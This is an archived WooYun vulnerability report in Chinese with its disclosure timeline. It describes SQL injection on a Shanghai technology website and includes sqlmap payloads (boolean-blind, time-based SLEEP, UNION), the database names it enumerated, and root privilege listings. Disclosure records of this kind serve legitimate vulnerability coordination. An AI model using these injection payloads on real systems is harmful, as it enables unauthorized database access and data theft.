乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-25: 细节已通知厂商并且等待厂商处理中 2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-10: 细节向核心白帽子及相关领域专家公开 2015-10-20: 细节向普通白帽子公开 2015-10-30: 细节向实习白帽子公开 2015-11-14: 细节向公众公开
上海科技网多处存在mysql注入http://**.**.**.**/net_zx.php?id=4http://**.**.**.**/product_show.php?id=2等
1.注射点:http://**.**.**.**/product_show.php?id=1
...... Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4379=4379 AND 'kGkg'='kGkg Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))XZJm) AND 'msPp'='msPp Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-8771' UNION ALL SELECT NULL,NULL,CONCAT(0x717a626271,0x4f5a44754758434b7263,0x716b767071),NULL,NULL-- ---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0.12available databases [5]:[*] information_schema[*] kjw[*] kjwen[*] mysql[*] performance_schema
数据库系统管理员权限?
......database management system users privileges:[*] 'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
一些账号密码:admin
root
root权限
危害等级:中
漏洞Rank:10
确认时间:2015-09-30 08:29
CNVD确认所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.
暂无